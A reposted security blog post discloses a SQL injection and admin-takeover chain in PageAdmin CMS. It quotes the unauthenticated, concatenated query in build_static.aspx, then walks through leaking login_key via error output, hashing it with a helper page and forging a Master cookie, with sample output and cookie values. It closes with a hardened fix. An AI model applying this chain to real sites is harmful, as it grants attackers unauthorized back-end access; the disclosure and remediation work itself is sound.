PageAdmin CMS latest version SQL injection (tested against the official demo)

暗月博客 · published 2019-11-21 22:44:26 · 473 views · 3091 characters
Abstract

PageAdmin CMS latest version SQL injection. #1 A missing authorization check on /e/master/build_static.aspx

#2 The injection point

Brief description:

SQL injection in the latest version of PageAdmin CMS

Detailed description:

#1 A missing authorization check: /e/master/build_static.aspx

Code:

protected void Page_Load(Object src,EventArgs e)
{
    // no login check runs before this handler: both values come straight from the query string
    Ids=Request.QueryString["ids"];
    Table=Request.QueryString["table"];
    Conn Myconn=new Conn();
    conn=Myconn.OleDbConn();   // get the OleDbConnection
    switch(Table)
    {
        case "pa_zt":
            Build_Lanmu();
            break;
        case "pa_zt_sublanmu":
            Build_SubLanmu();
            break;
        case "pa_lanmu":
            Build_Lanmu();
            break;
        case "pa_sublanmu":
            Build_SubLanmu();
            break;
        default:
            Build_Detail();   // any other table name is handled here
            break;
    }
}

#2 The injection point

Code:

private void Build_Detail()
{
    conn.Open();
    if(Ids!=null && IsNum(Ids.Replace(",","")))
    {
        Build_Html BH=new Build_Html();
        if(IsNum(Ids))
        {
            // Table is taken unchecked from the query string and concatenated into the SQL text
            sql="select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from "+Table+" where html=2 and id="+Ids;
        }
        else
        {
            sql="select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from "+Table+" where html=2 and id in("+Ids+")";
        }
        OleDbCommand comm=new OleDbCommand(sql,conn);
        OleDbDataReader dr=comm.ExecuteReader();
        while(dr.Read())
        {
            try
            {
                BH.Build_Detail(dr["site_dir"].ToString(),dr["static_dir"].ToString(),dr["static_file"].ToString(),dr["lanmu_id"].ToString(),dr["sublanmu_id"].ToString(),dr["id"].ToString());
            }
            catch(Exception e)
            {
                LocalUrl="http://"+Request.ServerVariables["SERVER_NAME"]+":"+Request.ServerVariables["SERVER_PORT"];
                SiteDir=dr["site_dir"].ToString();
                SiteDir=(SiteDir==""?"/":("/"+SiteDir+"/"));
                // the selected columns and the exception message are written back to the client
                ErrorUrl=LocalUrl+SiteDir+"index.aspx?lanmuid="+dr["lanmu_id"].ToString()+"&sublanmuid="+dr["sublanmu_id"].ToString()+"&id="+dr["id"].ToString();
                Response.Write(ErrorUrl+"生成失败:"+e.Message);
                Response.End();
                break;
            }
        }
        dr.Close();
        conn.Close();
        Response.Write("success");
        Response.End();
    }
    Response.Write("Invalid Ids");
    Response.End();
}

Here the Table parameter is attacker-controlled and is concatenated directly into the query:

Code:

sql="select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from "+Table+" where html=2 and id="+Ids;

and the error path echoes the selected columns back in the response:

Code:

ErrorUrl=LocalUrl+SiteDir+"index.aspx?lanmuid="+dr["lanmu_id"].ToString()+"&sublanmuid="+dr["sublanmu_id"].ToString()+"&id="+dr["id"].ToString();
Response.Write(ErrorUrl+"生成失败:"+e.Message);

#3 A crafted request yields login_key (see the POC). The Valicate value in the authentication cookie is produced by the code below, and LoginKey itself is stored in the database's login_key column:

Code:

string LoginKey=Guid.NewGuid().ToString("N")+LoginDate.AddSeconds(r.Next(1,2592000)).ToString("yyMMddHHmmss");
Md5 Jm=new Md5();
HttpCookie MCookie=new HttpCookie("Member");
MCookie.Values.Add("UID",UID);
MCookie.Values.Add("Valicate",Jm.Get_Md5(LoginKey));   // the cookie carries the hash of LoginKey
Response.AppendCookie(MCookie);
Update_Member(UID,LoginDate,LoginKey);                  // LoginKey is persisted to the database

#4 Use a local PageAdmin installation to hash the login_key:

Code:

Create test.aspx:

<% @ Import NameSpace="System.Data.OleDb"%>
<% @ Import NameSpace="PageAdmin"%>
<script Language="C#" Runat="server">
protected void Page_Load(Object sender,EventArgs e)
{
    string loginkey=Request.QueryString["loginkey"];
    Response.Write(new Md5().Get_Md5(loginkey));   // same Md5 wrapper the CMS uses for Valicate
}
</script>

#5 Forging the cookie gives access to the back end

Code:

**.**.**.** FALSE / FALSE Master UID=2&Valicate=abd2128c766f990f7b4ec19c137e452117db
**.**.**.** FALSE / FALSE SiteId 1

Proof of vulnerability:

#1 Use the POC to trigger the error

code 区域

http://**.**.**.**:80/2/index.aspx?lanmuid=bae915239122142b5101e319cf516ef3e371121&sublanmuid=f3fac35c66184f9281b221fa41ddbf59_160123191804&id=2生成失败:The remote server returned an error: (404) Not Found.

Here the sublanmuid value is the login_key and the lanmuid value is the password.

#2 Obtain the hashed valicate

abd2128c766f990f7b4ec19c137e452117db

#3 Forge the cookie and enter the back end

Fix:

#1 Add authentication to the page

#2 sql_format
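As an added illustration of both fixes (example code, not PageAdmin's own): a hardened Build_Detail that requires a logged-in master session, accepts the table name only if the database catalogue knows it, binds the ids as OleDb parameters, and logs the exception instead of reflecting it. Conn.OleDbConn() and Build_Html are the names used above; IsAdminLoggedIn() is a hypothetical helper assumed to wrap the CMS's own session check.

```csharp
// Added example, not PageAdmin's own code: a hardened query path for Build_Detail.
// Conn.OleDbConn() and Build_Html are names from this page; IsAdminLoggedIn() is a
// hypothetical helper assumed to wrap the CMS's own master-session check.
using System;
using System.Data;
using System.Data.OleDb;
using System.Linq;

public partial class BuildStaticHardened : System.Web.UI.Page
{
    // Accept a table name only if the catalogue knows it: the query string never contributes raw SQL text.
    private static bool TableExists(OleDbConnection conn, string name) {
        return conn.GetSchema("Tables").Rows.Cast<DataRow>().Any(r =>
            string.Equals(r["TABLE_NAME"] as string, name, StringComparison.OrdinalIgnoreCase));
    }
    private void Fail(string msg) { Response.Write(msg); Response.End(); }

    private void Build_Detail(string table, string ids) {
        // Fix #1 from the post: the page itself must require a logged-in administrator.
        if (!IsAdminLoggedIn()) { Response.StatusCode = 403; Response.End(); return; }
        // Fix #2: every id must parse as a non-negative integer and is bound as a parameter, never concatenated.
        int[] idList = (ids ?? "").Split(',')
            .Select(s => { int n; return int.TryParse(s.Trim(), out n) && n >= 0 ? n : -1; }).ToArray();
        if (idList.Length == 0 || idList.Any(n => n < 0)) { Fail("Invalid Ids"); return; }
        using (OleDbConnection conn = new Conn().OleDbConn()) {
            conn.Open();
            if (!TableExists(conn, table)) { Fail("Invalid table"); return; }
            // OleDb parameters are positional '?' markers: one per id, bound below.
            string sql = "select id,site_dir,static_dir,static_file,lanmu_id,sublanmu_id from " + table
                + " where html=2 and id in(" + string.Join(",", idList.Select(_ => "?")) + ")";
            using (OleDbCommand comm = new OleDbCommand(sql, conn)) {
                for (int i = 0; i < idList.Length; i++) comm.Parameters.AddWithValue("p" + i, idList[i]);
                using (OleDbDataReader dr = comm.ExecuteReader()) {
                    Build_Html bh = new Build_Html();
                    while (dr.Read()) {
                        try {
                            bh.Build_Detail(dr["site_dir"].ToString(), dr["static_dir"].ToString(), dr["static_file"].ToString(),
                                dr["lanmu_id"].ToString(), dr["sublanmu_id"].ToString(), dr["id"].ToString());
                        } catch (Exception ex) {
                            // Log server-side and answer generically: the original echoed row columns plus e.Message.
                            System.Diagnostics.Trace.TraceError("build_static failed for id {0}: {1}", dr["id"], ex);
                            Fail("build failed"); return;
                        }
                    }
                }
            }
        }
        Response.Write("success");
    }
}
```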

Reprinted by CN-SEC; keep this link when reposting: https://cn-sec.com/archives/72963.html
